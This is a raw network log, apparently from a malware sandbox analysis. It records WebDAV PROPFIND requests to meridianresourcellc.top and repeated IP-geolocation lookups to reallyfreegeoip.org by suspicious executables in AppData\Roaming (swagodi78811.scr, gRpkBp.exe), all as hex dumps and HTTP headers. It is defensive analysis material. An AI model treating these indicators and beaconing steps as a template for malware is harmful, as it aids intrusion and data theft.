                                              2024-07-26 21:45:20 UTC1369INData Raw: 86 08 05 04 eb 06 25 00 6c 33 00 00 00 00 86 08 14 04 f0 06 25 00 9c 33 00 00 00 00 84 08 ed 10 88 03 26 00 b4 33 00 00 00 00 84 08 fc 10 8e 03 26 00 c0 33 00 00 00 00 84 08 e4 0d a2 00 27 00 fc 33 00 00 00 00 86 18 94 10 15 00 27 00 58 34 00 00 00 00 c4 00 6e 0a 24 03 28 00 90 34 00 00 00 00 c4 00 7c 15 35 03 29 00 4c 36 00 00 00 00 c4 00 4f 02 61 03 2a 00 78 36 00 00 00 00 84 00 35 02 75 06 2b 00 9b 36 00 00 00 00 86 00 ff 16 75 03 2d 00 ac 36 00 00 00 00 86 00 ff 16 f6 06 30 00 c0 37 00 00 00 00 84 00 5d 15 01 00 35 00 54 38 00 00 00 00 84 00 65 16 06 00 36 00 6c 39 00 00 00 00 86 00 b5 0b c3 03 36 00 b8 39 00 00 00 00 86 00 23 04 01 07 36 00 d8 39 00 00 00 00 84 00 4d 15 07 07 37 00 94 3a 00 00 00 00 94 00 bc 00 0e 07 38 00 b0 3a 00 00 00 00 94 00 bc
                                              Data Ascii: %l3%3&3&3'3'X4n$(4|5)L6Oa*x65u+6u-607]5T8e6l969#69M7:8:


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8192.168.2.2249169172.67.197.72443
                                              TimestampBytes transferredDirectionData
                                              2024-07-26 21:45:24 UTC170OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 6d 65 72 69 64 69 61 6e 72 65 73 6f 75 72 63 65 6c 6c 63 2e 74 6f 70 0d 0a 0d 0a
                                              Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: meridianresourcellc.top
                                              2024-07-26 21:45:24 UTC748INHTTP/1.1 405 Method Not Allowed
                                              Date: Fri, 26 Jul 2024 21:45:24 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Allow: OPTIONS,HEAD,GET,POST,TRACE
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0MnJXF4N1mFutiJDM0GTIiJfLwoJNY1XtU1IyzFH3YsYsnm%2B%2BwoG9VKNsCSrwULBzldk%2BWGZjZltehm2ajIfakJ8O8GkAofkUY1B%2FVw2oimHeogWFjd3NzzziwJLIc7gxfQjuESIMMD%2B8g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                              X-Content-Type-Options: nosniff
                                              Server: cloudflare
                                              CF-RAY: 8a9793993a611879-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-26 21:45:24 UTC230INData Raw: 65 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: e0<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p></body></html>
                                              2024-07-26 21:45:24 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                                              Data Ascii: 1
                                              2024-07-26 21:45:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9192.168.2.2249170172.67.197.72443
                                              TimestampBytes transferredDirectionData
                                              2024-07-26 21:45:28 UTC170OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 6d 65 72 69 64 69 61 6e 72 65 73 6f 75 72 63 65 6c 6c 63 2e 74 6f 70 0d 0a 0d 0a
                                              Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: meridianresourcellc.top
                                              2024-07-26 21:45:29 UTC748INHTTP/1.1 405 Method Not Allowed
                                              Date: Fri, 26 Jul 2024 21:45:28 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Allow: OPTIONS,HEAD,GET,POST,TRACE
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jfz3FVHSAjBcFz269Eqy4O1UYnl2uZQ46O%2Fn6XBUJud96nzlFvdJvKrevF9VTpxJvX6%2FfiE%2BOkfxQV%2B%2BMrW9ljZbraOxhcwk23DV4VGRFDDHBG4NGJlqcDOXr53uJo4aGdibZrLuHp2UZg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                              X-Content-Type-Options: nosniff
                                              Server: cloudflare
                                              CF-RAY: 8a9793b29fca43a4-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-26 21:45:29 UTC230INData Raw: 65 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: e0<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p></body></html>
                                              2024-07-26 21:45:29 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                                              Data Ascii: 1
                                              2024-07-26 21:45:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              10192.168.2.2249172188.114.97.34433880C:\Users\user\AppData\Roaming\swagodi78811.scr
                                              TimestampBytes transferredDirectionData
                                              2024-07-26 21:45:33 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-07-26 21:45:33 UTC704INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:33 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 52946
                                              Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wOq3EccjYzCU4kRj3Xj7U7ViRr9kiUCBBX71fMAQ2QfTGy4yWDTko6QHUHmuk3D2DvnDSeFdlUGzgatqARv%2F6wElnxkogiGdCYgPAjSjes0VddsvA8u%2F19uOG9aqiydsnc5VMMrP"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a9793d1f9e64401-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-26 21:45:33 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-26 21:45:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              11192.168.2.2249173188.114.97.34433880C:\Users\user\AppData\Roaming\swagodi78811.scr
                                              TimestampBytes transferredDirectionData
                                              2024-07-26 21:45:34 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-07-26 21:45:34 UTC706INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:34 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 52947
                                              Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ujXyklca8eklKYIUvbKeF%2BW6YYF7CWg4yD%2F3JoOqXtwD3EjnVAmvuz6EGCAJhKrOKPfKmV1XeJ6TeYHT4fa49mNDgu1LrSd%2FrIYVIEDAjqYryAwNeMcVXhPETtK2fysUBVci90NH"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a9793d89cb97d00-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-26 21:45:34 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-26 21:45:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              12192.168.2.2249175188.114.97.34433880C:\Users\user\AppData\Roaming\swagodi78811.scr
                                              TimestampBytes transferredDirectionData
                                              2024-07-26 21:45:36 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-07-26 21:45:36 UTC708INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:36 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 52949
                                              Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=exzimh%2FfCkWM00XKtUP7n7rxKVYdZ61nJESUsj8iNfFV3CcBH05P3ZWmy8sh9raN4sC%2B8047ysrwOX%2BEdL2MxeYZR5%2FgA7XCgj2jtg1NfKwLJE4xQBQHKIa23yYOtYRG3fwRO39l"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a9793e1aa8f4233-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-26 21:45:36 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-26 21:45:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              13192.168.2.2249178188.114.97.34432060C:\Users\user\AppData\Roaming\gRpkBp.exe
                                              TimestampBytes transferredDirectionData
                                              2024-07-26 21:45:38 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-07-26 21:45:38 UTC708INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:38 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 52951
                                              Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pSxDHy3qPVKnMaagdSkI9fR9Z1izbWZbwa0XJcbkWV0qEo6CmIWbN4G%2F7zHcnutTzeTE6uAlitoJvQM7vzG2%2B%2BEyuvduH26QMwKQMkG6PkvPrk44z3%2BtaFrnwfq5uPqfgiYWLpBI"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a9793f18ede439a-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-26 21:45:38 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-26 21:45:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              14192.168.2.2249179188.114.97.34432060C:\Users\user\AppData\Roaming\gRpkBp.exe
                                              TimestampBytes transferredDirectionData
                                              2024-07-26 21:45:39 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-07-26 21:45:39 UTC712INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:39 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 52952
                                              Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q%2FiKxM6jHOPgjvjJ3GOSPxP2IgRTtzPJFYjeoSRKlfKSBxc0uZMXtLHWThcwvXC7lf1HKwPu%2BN9ng9J74x5%2Bo8p%2BHHV%2B5cB5vlgm8qBR1QXi%2FP529DkTUzd7XrXRjpCYW5v8CaZY"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a9793f6ffb77288-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-26 21:45:39 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-26 21:45:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              15192.168.2.2249181188.114.96.34433880C:\Users\user\AppData\Roaming\swagodi78811.scr
                                              TimestampBytes transferredDirectionData
                                              2024-07-26 21:45:41 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-07-26 21:45:41 UTC714INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:41 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 52954
                                              Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BzMaFP3yp9jCNdr%2FQPxMFlWCImvFMvJWuEcBJ0HFlyROUwFui6hBaKmavYu%2BvxgOh1Sb8H6GwhptWK46dyClykG3%2FTZeGxMbqJmh1k%2F49TSL4A%2BXzkNRkwk0f0rEcW9mV%2BpCk5FM"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a9794012c0c43f2-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-26 21:45:41 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-26 21:45:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              16192.168.2.2249183188.114.97.34432060C:\Users\user\AppData\Roaming\gRpkBp.exe
                                              TimestampBytes transferredDirectionData
                                              2024-07-26 21:45:42 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-07-26 21:45:42 UTC708INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:42 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 52955
                                              Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mzCvUKwVsfh%2Bf5HFiuvfY6Eq6NkRRCjmSDMHMgPF7uqoekI53ZpSPf7Z4j7r8QPhHUt%2F5KJdKF55XJcAePbT2j00Zpn1jVdOuZ9Z%2FV9rHakTCYoRQJNxWdBAmJ3GbrxqT5PPE%2Fjw"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a9794067da6187d-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-26 21:45:42 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
